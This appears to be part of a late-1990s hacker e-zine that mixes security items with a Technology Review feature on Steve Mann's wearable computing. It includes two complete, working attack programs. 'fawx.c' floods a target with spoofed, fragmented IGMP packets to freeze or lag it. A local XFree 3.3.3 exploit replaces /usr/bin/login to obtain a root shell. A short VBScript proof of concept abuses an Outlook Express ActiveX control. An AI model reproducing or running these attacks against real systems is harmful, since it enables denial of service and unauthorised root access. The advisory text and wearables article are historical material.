       ---------------------8<-------- traceroute.diff ------------------------------
       
       
       
       Appendix B. References
       
       [1] Y. Rekhter, B. Moskowitz, D. Karrenberg, G. J. de Groot and E. Lear,
           "Address Allocation for Private Internets" RFC1918, February 1996
       
       [2] Van Jacobson, traceroute documentation and source code, Lawrence
           Berkeley National Laboratory
       
       [3] Thomas H. Ptacek and Timothy Newsham, "Insertion, Evasion, and Denial
           of Service: Eluding Network Intrusion Detection", Secure Networks,
           January 1998 
       
       1 In fact, in the traceroute dumps, the original RTTs (round-trip times)
         are left in as they appeared.
        
       2 Traceroute version 1.4a5 (ftp://ee.lbl.gov/traceroute1.4a5.tar.Z)
         allows for ICMP echo based traceroutes via the -I flag.  Windows NT's
         version of traceroute 'tracert' exclusively uses ICMP echoes.
       
       3 It should be noted that the assumption that it is our target gateway
         that is dropping the traffic may not be correct.  There are several things
         that could cause a false positive in this case:
         - A host could also be down or simply not responding.  
         - IP is unreliable.  Packets can be dropped for any number of reasons.
         - The packet could also be dropped by a previous filtering gateway
         before it ever reaches our target gateway host.
        
       4 It is significant to note that the ultimate destination host does not
         have to be reached.  It just needs to be somewhere downstream, on the
         other side of the gateway from the firewalking host.
       
       5 If an intermediate filter is shown to drop packets, this prevents
         firewalk from scanning the actual target machine for the blocked packet
         type, on that route.  This is annoying.
       
       
       EOF
       
       @HWA      
       
 16.0  IGMP+8 fragmentation attack for Linux
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       /* fawx.c v1 by ben-z -- igmp-8+frag attack for linux *
        *   thanks to datagram for ssping.c - helped lots    *
        * -------------------------------------------------- *
        * DESCRIPTION:                                       *
        *  Sends oversized fragmented IGMP packets to a box  *
        *  either making it freeze (WinNT/9x), or lagging    *
        *  it to hell and back. Since most win32 firewalls   *
        *  dont support IGMP, the attack successfully        *
        *  penetrates into the system, making it much more   *
        *  effective than an ICMP attack which is likely to  *
        *  be filtered.                                      *
        * GREETINGS:                                         *
        *  mad props to datagram for writing ssping, also    *
        *  thanks to #fts(2) on undernet and the psychic     *
        *  crew on efnet. shouts to ka0z, cyrus, magicfx,    *
        *  ice-e, zeronine, soupnazi, benito, eklipz, c0s,   *
        *  metalman, chawp, folk, atomic-, dethwish, sindawg *
        *  mosthated, and everyone on irc.slacknet.org..     */
       
        #include <stdio.h>
        #include <unistd.h>
        #include <stdlib.h>
        #include <string.h>
        #include <sys/types.h>
        #include <sys/time.h>
        #include <sys/socket.h>
        #include <netdb.h>
        #include <arpa/inet.h>      /* inet_addr() */
        #include <netinet/in.h>
        #include <netinet/ip.h>
        #include <netinet/ip_icmp.h>
        #include <netinet/igmp.h>
       
       void banner(void) {
          printf(" -----------------------------------------------\n");        
          printf("| fawx v1 by ben-z: igmp-8+frag spoofing attack |\n");
          printf(" -----------------------------------------------\n");
       }
       
       void usage(const char *progname) {
       
            printf("[**] syntax: %s <spoof host> <target host> <number>\n",progname);
       
       }
       
       int resolve( const char *name, unsigned int port, struct sockaddr_in *addr ) {
       
          struct hostent *host;
       
          memset(addr,0,sizeof(struct sockaddr_in));
       
          addr->sin_family = AF_INET;
          addr->sin_addr.s_addr = inet_addr(name);
       
          if (addr->sin_addr.s_addr == -1) {
             if (( host = gethostbyname(name) ) == NULL )  {
                fprintf(stderr,"\nuhm.. %s doesnt exist :P\n",name);
                return(-1);
             }
             addr->sin_family = host->h_addrtype;
             memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
          }
       
          addr->sin_port = htons(port);
          return(0);
       
       }
       
       unsigned short in_cksum(addr, len)
           u_short *addr;
           int len;
       {
           register int nleft = len;
           register u_short *w = addr;
           register int sum = 0;
           u_short answer = 0;
        
           while (nleft > 1)  {
               sum += *w++;
               nleft -= 2;
           }
        
           if (nleft == 1) {
               *(u_char *)(&answer) = *(u_char *)w ;
               sum += answer;
           }
        
           sum = (sum >> 16) + (sum & 0xffff);
           sum += (sum >> 16);         
           answer = ~sum;              
           return(answer);
       }
       
       int send_fawx(int socket,
                        unsigned long spoof_addr,
                        struct sockaddr_in *dest_addr) {
       
          unsigned char  *packet;
          struct iphdr   *ip;
          struct igmphdr *igmp;
          int rc;
       
               
          packet = (unsigned char *)malloc(sizeof(struct iphdr) +
                                           sizeof(struct igmphdr) + 8);
       
          ip = (struct iphdr *)packet;
          igmp = (struct igmphdr *)(packet + sizeof(struct iphdr));
       
          memset(ip,0,sizeof(struct iphdr) + sizeof(struct igmphdr) + 8);
          
          ip->ihl      = 5;
          ip->version  = 4;
          ip->id       = htons(34717);
          ip->frag_off |= htons(0x2000);
          ip->ttl      = 255;
          ip->protocol = IPPROTO_IGMP;
          ip->saddr    = spoof_addr;
          ip->daddr    = dest_addr->sin_addr.s_addr;
          ip->check    = in_cksum(ip, sizeof(struct iphdr));
       
       
          igmp->type              = 8;
          igmp->code              = 0;
       
          if (sendto(socket,
                     packet,
                     sizeof(struct iphdr) +
                     sizeof(struct igmphdr) + 1,0,
                     (struct sockaddr *)dest_addr,
                     sizeof(struct sockaddr)) == -1) { return(-1); }
          
       
          ip->tot_len  = htons(sizeof(struct iphdr) + sizeof(struct igmphdr) + 8);
          ip->frag_off = htons(8 >> 3);
          ip->frag_off |= htons(0x2000);
          ip->check    = in_cksum(ip, sizeof(struct iphdr));
       
          igmp->type = 0;
          igmp->code = 0;
       
          if (sendto(socket,
                     packet,
                     sizeof(struct iphdr) +
                     sizeof(struct igmphdr) + 8,0,
                     (struct sockaddr *)dest_addr,
                     sizeof(struct sockaddr)) == -1) { return(-1); }
       
          free(packet);
        /*  printf(".");  <- it looked way too ugly :P */
          return(0);
       
       }
       
        int main(int argc, char **argv) {
        
           struct sockaddr_in dest_addr;
           unsigned int i;
           int sock;                       /* signed: socket() returns -1 on error */
           unsigned long src_addr;
        
           banner();
           if ((argc != 4)) {
              usage(argv[0]);
              return(-1);
           }
           
           if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { 
              fprintf(stderr,"error opening raw socket. <got root?>\n");
              return(-1);
           }
           
           if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); }
           src_addr = dest_addr.sin_addr.s_addr;
        
           if (resolve(argv[2],0,&dest_addr) == -1) { return(-1); }
        
           printf("[**] sending igmp-8+frag attacks to: %s.",argv[2]);
           for (i = 0;i < atoi(argv[3]);i++) {
              if (send_fawx(sock,
                               src_addr,
                               &dest_addr) == -1) {
                 fprintf(stderr,"error sending packet. <got root?>\n");
                 return(-1);
              }
              usleep(10000);
            }
           printf(" *eof*\n");
           return(0);
        }
       
       @HWA      
       
 17.0  Local XFree 3.3.3 symlink root compromise..(freeBSD+others)......      
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       /*** local XFree 3.3.3-symlink  root-compromise.
        *** Tested under FreeBSD 3.1 (but should work on others 2)
        *** (C) 1999/2000 by Stealthf0rk for the K.A.L.U.G. 
        *** (check out http://www.kalug.lug.net/stealth or /coding for
        ***  other kewl stuff!)
        ***
        *** FOR EDUCATIONAL PURPOSES ONLY!!! USE IT AT YOUR OWN RISK.
        *** Even if this program restores all, you should backup your
        *** login before running this.
        ***/
       
        #include <stdio.h>
        #include <stdlib.h>     /* exit() */
        #include <string.h>     /* memset() */
        #include <unistd.h>
        #include <errno.h>
        #include <fcntl.h>
        #include <signal.h>     /* kill() */
        #include <sys/stat.h>   /* chmod() */
       
       #define LOGIN "/usr/bin/login"
       #define TELNET "/usr/bin/telnet"
       
       int cp(const char*, const char*, int);
       
       int main(int argc, char **argv)
       {
       
               char *telnet[] = {TELNET, "localhost", NULL};
               char *shell[] = {"/bin/sh", NULL};
               char *X[] = {"/usr/X11R6/bin/xinit", NULL};
               FILE *f = NULL;
               int p = 0;
               char buf[1000] = {0};
       
               /* the rootshell */
               if (!geteuid() || !getuid()) {
                       unlink(LOGIN);
                       cp("/tmp/L", LOGIN, 1);
                       chmod(LOGIN, 04555);
                       printf("Welcome!\n");
                       unlink("/tmp/.X11-unix");
                       unlink("/tmp/L");
                       execve(*shell, shell, NULL);
               }
               
               /* back up */
               cp(LOGIN, "/tmp/L", 1);
               if (symlink(LOGIN, "/tmp/.X11-unix") < 0) {
                       perror("symlink (/tmp/.X11-unix)");
                       exit(errno);
               }
               if ((p = fork()) < 0) {
                       perror("fork");
                       exit(errno);
               } else if (p > 0) {
                       sleep(7);
                       kill(p, 9);
                       cp(argv[0], LOGIN, 1);
                       execve(telnet[0], telnet, NULL);
                       perror("fatal:");
               } else {
                       printf("Xfree 3.3.3 root-sploit by Stealth. http://www.kalug.lug.net\n");
                       printf("\n-> Please give me some seconds... <-\n\n");
                       execve(X[0], X, NULL);
               }
               return 0;
       }
               
               
       int cp(const char *from, const char *to, int how)
       {
               int in = 0, out = 0, r = 0;
               char buf[1000] = {0};
               
       
               printf("cp %s %s\n", from, to);
               /* overwrite ? */
               if (how == 1) 
                       how = O_RDWR|O_TRUNC|O_CREAT;
               else
                       how = O_RDWR|O_CREAT;
       
                /* O_CREAT requires a mode argument */
                if ((out = open(to, how, 0644)) < 0) {
                        perror("open 1");
                        exit(errno);
                }
               if ((in = open(from, O_RDONLY)) < 0) {
                       perror("open 2");
                       exit(errno);
               }
               while ((r = read(in, buf, 1000-1)) > 0) {
                       write(out,buf,r);
                       memset(buf,0,1000);
               }
               close(in); close(out);
               return 0;
       }

       
       
       @HWA
       
 18.0  Microsoft Outlook Express internet zone vulnerability
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Date: Mon, 26 Apr 1999 05:07:19 -0700
       From: "1nternal @geocities.com" <1nternal@MY-DEJANEWS.COM>
       To: BUGTRAQ@netspace.org
       Subject: Minor privacy exploit in Outlook Express
       
        Outlook Express uses HTML to display certain information in the 'outlook today' type part of outlook
        express, ie, the number of unread messages in your inbox etc...
       
       Because it is considered to be in the 'internet zone', this information needs to be safely scriptable,
       thus it can be accessed by any site in this zone. This allows for a possible (although admittedly minor) 
       privacy and possibly security problem.
       
       The 'problem' lies in the 'OutlookExpress.MessageList' ActiveX control, which is marked safe for 
       scripting, it allows for counting the number of messages in any folder within outlook express, as well as
       the number of unread items and a few other things, such as setting options, however, the options are only
       set for that instance only and are not saved.
       
        An example of viewing the number of messages in a folder, as well as previewing the message (creating the
        file 'C:\oe_prev$.eml' without the user's permission). It should be noted that this preview message is not
        accessible remotely (without an exploit).
       
       <script language="VBSCRIPT"><!--
       
       set MsgList = CreateObject("OutlookExpress.MessageList")
       MsgList.Folder = 6
       msgbox(MsgList.Count)
       location.href = MsgList.PreviewMessage
       
       --></script>
       
        Obviously, this could also be done in JavaScript, however it would still require ActiveX support and OE5.
       
       1nternal@my-dejanews.com
       
       @HWA       
       
 19.0  Big Brother 1.09b/c security notice.
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
       Date: Mon, 26 Apr 1999 06:49:59 -0400
       From: Sean MacGuire <sean@WWW.MACLAWRAN.CA>
       To: BUGTRAQ@netspace.org
       Subject: FW: Security Notice: Big Brother 1.09b/c
       
       http://www.maclawran.ca/bb/ for more info on Big Brother.
       
       
       -----FW: <199904261049.GAA07967@www.maclawran.ca>-----
       
       Date: Mon, 26 Apr 1999 06:49:59 -0400 (EDT)
        From: Sean MacGuire <sean@www.maclawran.ca>
       To: solo@dok.org
       Subject: Security Notice: Big Brother 1.09b/c
       
       
       This notice concerns the Big Brother System and Network Monitor.
       
       We noticed you downloaded a version which could be affected by
       this problem so we wanted to tell you about it.
       
       If you have any questions or concerns, feel free to contact me
       at mailto:sean@maclawran.ca.  Sorry for any inconvenience.
       
                       ===========================
                       Big Brother Security Notice
                       ===========================
       
       Versions: 1.09b and 1.09c
       
       Module:   CGI History module (web/bb-hist.sh)
       
       Affects:  Anyone who's installed the new history viewer
                 bb-hist.sh as a CGI program.
       
       Summary:  Exploiting the problem could allow the partial
                 display of local files provided they are readable
                 by your web server, and text-based.
       
       Fix:      Please pick up a new version of the bb-hist.sh file
                 at: http://maclawran.ca/bb-dnld/bb-hist.sh
       
       Found by: Michael Smith <michael@csuite.ns.ca>  Thanks Michael.
       
       I've also updated the archive to be 1.09d (this is the only
       change).
       --
       Sean MacGuire, Reality Engineer               sean@MacLawran.ca
       The Big Brother Ministry of Truth      http://maclawran.ca/sean
       icbm --> 45'31.06N-73'35.19W                    +1 514 982 9688
                     "Looking down the barrel of another day"
       
       --------------End of forwarded message-------------------------
       
       
       @HWA      
       
 20.0  Cyborg Seeks Community
       ~~~~~~~~~~~~~~~~~~~~~~
       
     May/June 1999 - Original URL - http://www.techreview.com/articles/may99/mann.htm 

   
     Cyborg Seeks Community 

     Meet one of the creators of wearable computing and join him in his search for like-minded folks to live in an augmented reality.

     By Steve Mann 

      People find me peculiar. They think it's odd that I spend most of my waking hours wearing eight or nine
     Internet-connected computers sewn into my clothing and that I wear opaque wrap-around glasses day and night, inside
     and outdoors. They find it odd that to sustain wireless communications during my travels, I will climb to the hotel roof to
     rig my room with an antenna and Internet connection. They wonder why I sometimes seem detached and lost, but at
     other times I exhibit vast knowledge of their specialty. A physicist once said he felt that I had the intelligence of a dozen
     experts in his discipline; a few minutes later, someone else said they thought I was mentally handicapped. 

      Despite the peculiar glances I draw, I wouldn't live any other way. I have melded technology with my person and
     achieved a higher state of awareness than would otherwise be possible. I see the world as images imprinted onto my
     retina by rays of light controlled by several computers, which in turn are controlled by cameras concealed inside my glasses. 

     Every morning I decide how I will see the world that day. Sometimes I give myself eyes in the back of my head. Other days I add a sixth sense, such as
      the ability to feel objects at a distance. If I'm going to ride my bicycle, I'll want to feel the cars and trucks pressing against my back, even when they are
     a few hundred feet away. 

     Things appear different to me than they do to other people. I see some items as hyperobjects that I can click on and bring to life. I can choose
     stroboscopic vision to freeze the motion of rotating automobile tires and see how many bolts are on the wheels of a car going over 60 miles per hour, as
      if it were motionless. I can block out the view of particular objects, sparing me the distraction, for example, of the vast sea of advertising around me. 

     I live in a videographic world, as if my entire life were a television show. And many people assume that by living my life through the screen, I do exactly
      what television leads us to do: tune out reality. In fact, WearComp has quite the opposite effect: Visual filters help me concentrate on what is
     important, heightening my sensitivity and setting my imagination free. I do of course have occasion to remove my computational prostheses, as when I
     sleep, shower or splash around in the ocean. 

     In addition to having the Internet and massive databases and video at my beck and call most of the time, I am also connected to others. While I am
      grocery shopping, my wife (who may be at home or in her office) sees exactly what I see and helps me pick out vegetables. She can imprint images
     onto my retina while she is seeing what I see. I hope to add to the population of similarly equipped people; last fall at the University of Toronto, I taught
      what I believe to be the world's first course for cyborgs (see sidebar "School for Cyborgs"). 

     Much of my passion has been fueled by a desire to restore some balance of privacy in a world where individuals are increasingly affronted by
      government surveillance and corporate encroachments. In fact, one goal of my work was to challenge the notion of totalitarian video surveillance: the
     now-common practice of a corporate or governmental establishment wishing to know everything about everyone in the establishment while revealing
     nothing about itself. Many department stores, for example, use large numbers of hidden cameras and yet prohibit customers from taking pictures. 

     I attempted to draw attention to this phenomenon of unreciprocated video surveillance in Shooting Back, a documentary I made during my day-to-day
     life in several different countries over a period of many years. Whenever I found myself in a store or some other establishment with electronic eyes
     perusing the premises, I asked its management why they were taking pictures of me without my permission. They would typically ask me why I was so
     paranoid and tell me that only criminals are afraid of cameras. Of course I was covertly recording this response using my own hidden eyetap video
     camera. Then I would pull an ordinary camcorder out of my satchel and give them a chance to explain their position for the record. (The camcorder
     was simply a prop, of course, as the eyetap camera had been capturing the scene.) The same people who claimed that only criminals were afraid of
     cameras had an instantly paranoid (and sometimes violent) reaction to my camcorder. Shooting Back was, I believe, the first documentary to be
     transmitted in real time to the World Wide Web while it was shot. (Selected portions of Shooting Back may be viewed at
     http://wearcam.org/shootingback.html.) 

     Ahead of My Time 

      Growing up during the 1960s and early 1970s, I always seemed to be creating things before their time. I grew up in Hamilton, Ontario, a city on the
     western tip of Lake Ontario about 100 kilometers from Toronto. I came by this inclination naturally; during the early 1950s, my father had built what
     was perhaps the first wearable radio. (He had pursued radio as a hobby since his childhood.) He had taught me quite a bit about electronic circuits by
     the time I started kindergarten. As a young child, I removed the head from a portable battery-powered dictating machine and replaced it with the head
     from a high-fidelity audio cassette deck. From this cassette transport mechanism, I built a system that enabled me to listen to music while walking
     around. While many people scoffed at this invention, I found it nice to be able to drown out background music while shopping, to assert my own idea
     of personal space, and to defend myself from theft of my solitude by the department stores with their Muzak. 

      In my teens I founded a concept of mediated reality, which I called "lightspace." The goal of lightspace was to experience an altered perception of
     visual reality by exploring a large range of possible forms of illumination while observing a scene or object from different viewpoints. My work with
     lightspace led to the invention of my wearable computer. My desire to create photographic instruments that would function as true extensions of my
      mind and body, and my desire to control these photographic instruments in new ways, created a need for the ability to program complex sequences
     of events. 

     I began to take this matter seriously, building a digital computer from a large number of electronic components salvaged from an old telephone switching
     computer. I did much of this experimentation in the basement of a television repair shop where I spent much of my childhood as a volunteer, fixing TV
     sets. In this shop I built up a great deal of knowledge about electronic circuits. 

      The result of my early efforts was, in the early 1970s, a family of wearable computers I called "WearComp0." Sometimes I took these cumbersome
     prototypes outside in search of spaces dark enough to explore the altered perception of visual reality I could create using portable battery-powered
     light sources. People would cross the street to avoid me, not knowing what to make of what must have looked to them like an alien creature. The rig
     was physically a burden, weighing as much or more than I did. After wearing one of these encumbrances from sundown (when it got dark enough to
     use them) to sunrise, my feet would be swollen, blistered and bleeding. 

     I continued to refine WearComp0 and its evolutionary successor, WearComp1. After much tinkering, I came up with WearComp2 - my first system
     that truly qualified as a wearable computer in the sense that it was not just a special purpose device. WearComp2 was field programmable, with a
     full-function input device (a keyboard and joystick for cursor control both built into the handle of an electronic flashgun), text and graphical displays,
     sound recording and playback (crude, home-brew analog-to-digital and digital-to-analog converters), and a wireless data connection to provide links
     to other computers. I completed this system in 1981, before most of the world realized that computers could be portable, much less wearable. 

     Though an advance over my earlier prototype, WearComp2 was still a burden to lug. I wanted to reduce its bulk and make it
     look more normal. This goal led me in 1982 to experiment with building components directly into clothing. I learned how to
     make flexible circuits that could be embedded into ordinary fabric. This work enabled me to make versions of WearComp
     that were not only more comfortable to walk around in but also less off-putting to others. 

     In spite of these advances, my life as a cyborg remained mostly solitary. I did connect quite literally (by serial data cable) with
     an understanding woman during my freshman year at McMaster University in my hometown of Hamilton. We faced unusual
     challenges in this configuration, such as having to choose which public restroom to use when we were joined. Thinking back,
     I imagine we must have made a comical sight, trying to negotiate doorways without snagging the cable that tethered us
     together. 

     Such relationships were rare, and it was seldom that I could get others to wear my seemingly strange contraptions. Many people were unable to get
     past my technological shell, which they apparently found more than a little odd. Still, multimediated reality had provided me with a unique vision of the
     world, and by the mid-1980s I had a following of people on the fringes of society who shared (or at least appreciated) my vision. I was invited to shoot
     pictures for album covers and hair ads. By 1985, I began to realize that it wasn't just the finished photographs people wanted; they also seemed to
     enjoy watching me take the pictures. Often I would be shooting in large warehouses, with audiences of hundreds of people. I began to realize that I had
     become a cyborg performance artist. By the end of the 1980s, however, I found myself yearning to return to my more substantive childhood passions
     for science, mathematics and electrical engineering. 

     While at McMaster, I added biosensors to the WearComp so that it could monitor my heart rate (as well as the full EKG waveform) and other
     physiological signals. I also invented the "vibravest" - a garment studded with radar transceivers and vibrating elements. Wearing this vest made objects
     at a distance feel as if they were pressing against my body. I could close my eyes and walk down the hallway, confident that any wall or other obstacle
     would be felt as warning vibrations on the appropriate side of the vest. By sparing myself from the cognitive load of processing all that visual
     information, I found I was able to think more clearly. 

     In 1991, I brought my inventions to MIT as a PhD student. As a cyborg, uprooting myself from Canada was a formidable task, since I had installed my
     cyberbody in Canada over a period of many years. Going to MIT was a sudden move of my extended self. 

     First, I secretly climbed up onto the rooftops of buildings around the city to put in place the wireless data communications infrastructure I had brought
     with me from Canada. I had to quickly deploy my base stations at the top of elevator shafts or anywhere else I could find warm dry places. This way,
     whenever I wanted an Internet connection, these gateways would be ready to send the data to me, no matter where I was - even if I was in a basement
     or riding on the subway. 

     Although I kept in touch with my family through cyberspace, my first two years at MIT were lonely times IRL - in real life. I was, after all, the only
     person there with a wearable computer. Then in 1993, at the request of a fellow student, a local engineer named Doug Platt built a wearable system. I
     was no longer the only cyborg at MIT. 

     It took some years to get other cyborgs at MIT, thus enabling the beginnings of a sense of community. Although I never succeeded in getting a large
     community outfitted with my high-speed packet radio systems, the cellular telephones that began to emerge provided another answer to the problem of
     connectivity. 

     By the end of 1995, my work was attracting serious academic interest. I was asked to write an article about my work for IEEE Computer, a
     publication of the Institute of Electrical and Electronics Engineers' Computer Society. I also proposed an academic symposium on wearables and was
     referred to T. Michael Elliott, executive director of the Computer Society. I figured that such a conference would legitimize the field, which until then
     had consisted in many people's minds of "Steve, that crazy guy running around with a camera on his head." Elliott was enthusiastic about the idea and in
     1996 the Computer Society responded with an overwhelming "yes." This marked a turning point in my acceptance by my professional peers. 

     More than 700 people attended this first IEEE-sponsored symposium on wearable computing, held in Cambridge, Mass., in October 1997. A gala
     "Wearables" event the following day drew 3,000 people. In that same year I received my doctorate from MIT in wearable computing. This was a
     gratifying culmination: I had turned a childhood hobby and passion into an MIT project, the topic of a conference, and a PhD dissertation. 

     This past year I returned to Canada to pursue my work at the University of Toronto. Why Toronto? I had lived there in the mid-1980s, and the city
     had seemed very �cyborg-friendly. I had sensed there a cosmopolitan diversity as well as a genuine warmth and openness that contrasted with the
     more cyborg-hostile and tense atmosphere of some large U.S. cities. 

     Wearing Well 

     Although I spent many years developing WearComp in relative isolation, I welcome efforts to commercialize wearable computers. At the vanguard is
     Xybernaut, based in Fairfax, Va. Xybernaut's latest model is being manufactured by Sony, indicating that the Japanese electronics giant has an interest
     in what some believe will become the Walkman of computing. Last May, Xybernaut organized its own conference on wearable computing (and invited
     me to give the keynote address). I may also begin to license some embodiments of my original WearComp, as well as many of my more recent
     innovations, to companies who want to manufacture commercial systems. I think it will be especially important to make the cyborg outfit less
     cumbersome - something that's long been a goal of mine. My latest version is quite sleek, and looks just like ordinary bifocal eyeglasses, with the
     eyetap point hidden along the cut line. Even when fully rigged, I can still play an acceptable game of squash. 

     I realize that some people see me and my invention as a potential threat - like the Borg of Star Trek fame: "You will be assimilated." Clearly, there are
     important philosophical issues to be explored. Not only is there the danger of the technology being used to monitor people to make them into obedient
     productive cyborgs, but there is also the potential that people will become too dependent on this technology. My goal as a responsible inventor and
     engineer, however, has always been to encourage the development and manufacture of wearable computers as a means of personal, not institutional,
     empowerment. That will make worthwhile all the obstacles and challenges I have faced during my more than 20 years of developing this technology. 

     I hope that if I bring WearComp to market, anyone who wishes to will eventually be able to become a cyborg. We'll live in a collaborative
     computer-mediated reality that will allow us to no longer need to distinguish between cyberspace and the real world. And then this cyborg will have lots
     of company. 

     Steve Mann is a professor of electrical and computer engineering at the University of Toronto.



     Links

          Wearcomp.org: This is ground zero for Steve Mann's world of wearable computing. It includes links to his papers and conference presentations,
          as well as photos of his present and early wearable gear. 
          http://www.wearcomp.org/     
        
          The MIT Wearable Computing Web site. Information on MIT's work as well as a good set of links to other organizations, both commercial and
          academic. 
          http://wearables.www.media.mit.edu/projects/wearables/
          
          Wearable Computer Systems at Carnegie Mellon University. 
          http://www.cs.cmu.edu/afs/cs.cmu.edu/project/vuman/www/home.html
          
          Augmented reality research at Columbia University's computer graphics and user interfaces lab. 
          http://www.cs.columbia.edu/graphics/          
        
          Georgia Tech wearables page. 
          http://wearables.gatech.edu/
          
          International Symposium on Wearable Computers (ISWC). Archives of ISWC97 and ISWC98, and information about the upcoming ISWC99.
          http://iswc.gatech.edu/
        
          Wearables research at the University of Washington's Human Interface Technology (HIT) Lab. 
          http://www.hitl.washington.edu/projects/wearables/
        
          University of Oregon's wearable computing research group. 
          http://www.cs.uoregon.edu/research/wearables/Oregon/
        
          Xybernaut's home page. 
          http://www.xybernaut.com
        
          Wearable Webcrawler: This "wearable specific search index" is a comprehensive set of links to wearable computing resources on the Web. 
          http://wearables.gatech.edu/webcrawler.htm
        
          Wearables Central: Contains archives of the Usenet newsgroup comp.sys.wearables and of the mailing list Wear-Hard@haven.org. 
          http://wearables.blu.org/
          
   Sidebar:
   
 20.1  School for Cyborgs 
       ~~~~~~~~~~~~~~~~~~  
     
       Engineering students cross the human/machine gap - or do they?
 
       By Steve Ditlea 
 
       The black sunglasses perched on Steve Mann's forehead provide a rare tinge of
       high-tech glamour in a drab classroom in the University of Toronto's Department of
       Electrical & Computer Engineering. Wearing a ribbed red-and-gray sweater, Mann
       appears, to a casual observer, quite normal. And the class he teaches - "ECE 1766:
       Personal Imaging and Photoquantigraphic Image Processing" - seems ordinary. You'd
       never know the 20 students were recruited via a campus flyer bearing the headline: YOU
       WILL BE ASSIMILATED. BECOME THE WORLD'S FIRST "CYBORGS." 
 
       For anyone weaned on TV's latter-day Star Trek series and their vision of
       half-computer/half-humans losing their individuality to the collective consciousness known as the Borg, the notion of
       being absorbed into a computer-mediated entity terrifies and fascinates. As the pioneering class on becoming a cyborg,
       this one-semester offering for graduate students and fourth-year undergrads has attracted a smattering of casually
       dressed men and one woman. The polyglot group includes students from Germany and Iran, as well as Canadians with
       family ties to Asia and the Middle East. It is, in fact, the embodiment of Star Trek's multiethnic ethos. 
 
       Wearable PCs, brick-sized, with awkward monocular head-mounted displays, rest on the desks of just two
       students - the only overt sign that this may be a milestone of human-computer interaction. The wearable
       computers - commercially available systems on loan from manufacturer Xybernaut - are curiosities on a campus more
       familiar with notebook and palm computers. As students concentrate on their teacher's words, no wearables are
       actually in use. 
 
       Or so it seems. But look more closely at Mann and you see more than a dozen bulges straining the fabric of his striped
       sweater, like some Alien-movie spawn about to burst from his body. He trails a gray cable, an old-fashioned plastic
       rocker switch, some black, red and gray wires, and a miniature keyboard - items that just miss getting caught on the
       edge of his desk as he paces on and off the dais. Under his sweater Mann wears a lightweight wearable computer of his
       own design, wirelessly linked to the Internet and to his documents, which he can access in a screen hidden behind his
       glasses. In his computer-ready state, Mann is the only cyborg in the room - the master imparting esoteric knowledge to
       a new generation, knowledge that will allow them to become cyborgs, too. 
 
       For a few hours the previous week everyone in the class wore Xybernaut computers as they participated in what Mann
       calls their "first project as a community of cyborgs." Linked by a few cell phones, this pod of borgs toured the campus,
       capturing images using Mann's "lightspace" photographic technique. 
 
       Next week, for the course's "open eye" final exam, students are to wear Xybernauts "as an aid for calculations, as a
       memory prosthesis, etc.," according to the paper he hands out. Mann adds: "This may well be the world's first exam
       involving the testing of a class of cyborg entities - humans and computers, inextricably intertwined." 
 
       Grand thoughts, but here in the classroom, the cyborg vision has run into hard-edged reality. The Xybernaut systems,
       designed originally for defense and industrial applications, aren't really all that wearable - at least, not comfortably for
       more than minutes at a time. "It's bulky, it's heavy," says fourth-year undergrad Greg Harmandayan. Classmate Daniel
       Friedmann concurs: "What you wear on your waist and this head-mounted display isn't what I thought of as being
       completely wearable." Special student Stephen Ross, on a break from his full-time job, complains that "the equipment's
       battery life is too short to allow us to go online for any extended amount of time." 
 
       Not only does the hardware fall short - there are some human deficits as well. In winnowing down 40 applicants for the
       class, Mann insisted on knowledge of computing fundamentals. He later explains: "I said right up front that to succeed at
       this class, people better not be afraid of mathematics or of operating systems, getting down and dirty with the kernel."
       Unfortunately, the students who take the class are accustomed to Windows-based computer systems, and have
       required several weeks to acclimate themselves to the do-it-yourself tweaking of Linux, Mann's operating system of
       choice for his and his students' wearables. (A Xybernaut PC runs uncomfortably hot with Windows, remaining
       considerably cooler with Linux's more efficient code.) But the delay in Linux literacy slows Mann down, leaving him
       unable to cover as ambitious a syllabus as he would like during limited class hours. 
 
       When Mann teaches the course this summer in an immersion-intensive form, he plans to avoid both problems. "I might
       say as a prerequisite that you've already got to be a cyborg with your own equipment. I would take 20 or 30 people
       from around the world who are already cyborgs." And when ECE 1766 starts again in the fall, Mann expects students
       to be issued Xybernaut's next generation of wearables - faster, more compact systems manufactured through an
       arrangement with Sony. 
 
       For Mann, though, the computing hardware is incidental to a wider vision of "humanistic intelligence" - of
       computer-complemented humans in a multimedia world. "Wearable computing is meaningless in and of itself," he says.
       As he sees it, the personal computing applications of wearables stressed by commercial manufacturers such as
       Xybernaut are a mere subset of the visual recording, interpretation and augmentation functions of his own systems. 
 
       Having spent much of his life achieving oneness with his machine, Mann sometimes seems to forget how remarkable his
       accomplishment is. "How to be a cyborg is a totally boring concept," he insists. "The fundamental mathematical basis
       behind it makes it interesting. Otherwise, it's not much of a course." 
 
       Despite the doubts about their comfort and practicality, 16 of the 20 Xybernaut computers signed out by ECE 1766
       students remain at large following completion of the course. Several students are exploring the possibility of graduate
       study with Mann. Almost all have been marked for life. They have been assimilated. 
 
       Steve Ditlea is a contributing writer for Technology Review.
          
    
       @HWA       


 21.0  Anonymizing UNIX systems white paper by van Hauser/THC
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
              ---[ Anonymizing UNIX Systems ]--- 
                         version 0.7 
       
       
       
                Author: van Hauser / THC
       
       
       
       
       
            I. THE AUDIENCE
       
            II. GOAL
       
            III. PREREQUISITES
       
            IV. USER DATA
                 1. Sensitive user data
                 2. Protecting /home directories
                 3. Traceable user activity
                 4. Protecting /var/spool/mail/user files
       
            V. SYSTEM DATA
                 1. Sensitive system data
                 2. Traceable system activity
                 3. Logging - important and dangerous
                 4. Protecting system configs
                 5. Computer Memory and sensitive /proc interfaces
       
            VI. DELETE(D) DATA AND SWAP
                 1. How to delete files in a secure way
                 2. How to wipe free disk space
                 3. How to handle swap data
                 4. How to handle RAM
                 5. Temporary data - it is evil
       
            VII. NETWORK CONNECTIONS
       
            VIII. HIDING PRIVACY SETTINGS
                 1. Mount is your friend
                 2. Removable Medias
                 3. ???
       
